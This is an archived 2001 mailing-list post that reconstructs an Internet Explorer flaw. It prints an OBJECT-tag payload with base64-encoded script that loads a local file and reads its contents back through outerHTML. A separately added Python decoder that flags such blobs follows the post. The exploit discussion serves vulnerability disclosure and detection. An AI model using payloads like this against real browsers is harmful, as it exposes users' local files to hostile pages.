Vulnerability Development mailing list archives
Re: [ALERT] Remote File Execution By Web or Mail: Internet Explorer
From: Markus Kern <markus-kern () gmx net>
Date: Fri, 23 Nov 2001 17:18:41 +0100
[Had to resend everything because the original HTML file was rejected. Sorry if anyone gets it twice.]

NOMEN NESCIO SECURITY ALERT #9000989 666
Topic: Remote File Execution By Web or Mail: Internet Explorer
Severity: Critical
Date: 2001-11-21
There is a critical flaw within the html parser of Internet Explorer and its interpretation of certain html tags relative to the HKEY_CLASSES_ROOT\htmlfile_FullWindowEmbed key.
In accordance with the new suggested policy of responsible disclosure, no exploit and no further details will be made available at this time to the general public or the vendor. In 60 days from publication of this advisory full working exploits and details will be made available to the general public and vendor at the same time.
I don't want to bother anyone with my opinion on partial disclosure, so here is just what I came up with after two hours of playing with IE.

The advisory mentioned HKEY_CLASSES_ROOT\htmlfile_FullWindowEmbed, so creating an object of that type is probably a good idea...

<OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13">
</OBJECT>

Ok, alert(myObject.outerHTML); gives us the following:

<OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13
data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw
OzwvcD4= ></OBJECT>

Decoding the Base64 string we get (hex dump):

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C703E266E627370 3B3C2F703E        <p>&nbsp;</p>

The first part is a GUID and the second one looks like HTML. We inject the string

<script>document.location.href="file://c:\\test.txt";</script>

into the object using

<OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13"
data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+
ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+">
</OBJECT>

(There are probably easier ways to do this but I'm not very familiar with IE coding.)

Now to the interesting part. After c:\test.txt is loaded we can still access the data parameter of the object using myObject.outerHTML. This time it contains the Base64 encoded version of c:\\test.txt among other things.

So doing an alert(myObject.outerHTML); after the local file is loaded we get:

<OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13
data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV
FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9
FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb
nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0Q
ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K ></OBJECT>

with the Base64 string decoding to:

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C21444F43545950 452048544D4C2050  <!DOCTYPE.HTML.P
55424C494320222D 2F2F5733432F2F44  UBLIC."-//W3C//D
54442048544D4C20 342E30205472616E  TD.HTML.4.0.Tran
736974696F6E616C 2F2F454E223E0D0A  sitional//EN">..
3C48544D4C3E3C48 4541443E0D0A3C4D  <HTML><HEAD>..<M
4554412068747470 2D65717569763D43  ETA.http-equiv=C
6F6E74656E742D54 79706520636F6E74  ontent-Type.cont
656E743D22746578 742F68746D6C3B20  ent="text/html;.
636861727365743D 77696E646F77732D  charset=windows-
31323532223E3C2F 484541443E0D0A3C  1252"></HEAD>..<
424F44593E3C584D 503E68656C6C6F20  BODY><XMP>hello.
776F726C643C2F58 4D503E3C2F424F44  world</XMP></BOD
593E3C2F48544D4C 3E0D0A            Y></HTML>..

where "hello world" is the contents of c:\test.txt.

It all boils down to an ordinary DOM circumvention with all the usual implications. The attached exploit reads c:\test.txt and displays it.

I've only tested this on Windows 2k pro with IE 5.50, so confirmation on other OSes / versions is welcome.

regards,
Markus Kern
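As an added decoder, not part of Markus Kern's post or his attachment: this Python script pulls the application/x-oleobject data: URI out of the two outerHTML dumps quoted in the post, splits off the 16-byte GUID (stored in its in-memory little-endian layout) and returns the HTML that follows it, then flags a blob that carries script or a whole document instead of the empty paragraph a freshly created object reports. The two OBJECT strings are copied from the post as the list archive wrapped them; the function names are my own.

```python
import base64
import re
import uuid

# Constructed inputs: the two OBJECT outerHTML dumps from the post, with the
# base64 broken across lines exactly as the archive wrapped it.
DEFAULT_OBJ = (
    "<OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13 "
    "data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw\n"
    "OzwvcD4= ></OBJECT>"
)
LEAKED_OBJ = (
    "<OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13 "
    "data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV\n"
    "FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9\n"
    "FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb\n"
    "nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0Q\n"
    "ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K ></OBJECT>"
)

# The data attribute is unquoted in IE's outerHTML and quoted in page source;
# accept both, and let the base64 run span whitespace from line wrapping.
DATA_RE = re.compile(
    r'data\s*=\s*"?data:application/x-oleobject;base64,([A-Za-z0-9+/=\s]+)', re.I
)


def decode_oleobject_data(outer_html):
    """Return (clsid, html) from an OBJECT tag's x-oleobject data: URI."""
    m = DATA_RE.search(outer_html)
    if not m:
        raise ValueError("no application/x-oleobject data: URI found")
    raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
    if len(raw) < 16:
        raise ValueError("payload shorter than a 16-byte GUID")
    # Data1/Data2/Data3 are little-endian in the blob; bytes_le handles that.
    clsid = str(uuid.UUID(bytes_le=raw[:16])).upper()
    html = raw[16:].decode("windows-1252", errors="replace")
    return clsid, html


def is_suspicious(outer_html):
    """True when the blob holds script, a full document or a file: URL instead
    of the empty '<p>&nbsp;</p>' body a fresh htmlfile object reports."""
    _, html = decode_oleobject_data(outer_html)
    lowered = html.lower()
    return any(s in lowered for s in ("<script", "<html", "file://"))
```

The bytes on the page decode to CLSID 25336920-03F9-11CF-8FD0-00AA00686F13, which differs in the last digit of the first group from the 25336921-... CLASSID written in the tag.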
Attachment:
htmlfile_FWE-exploit.zip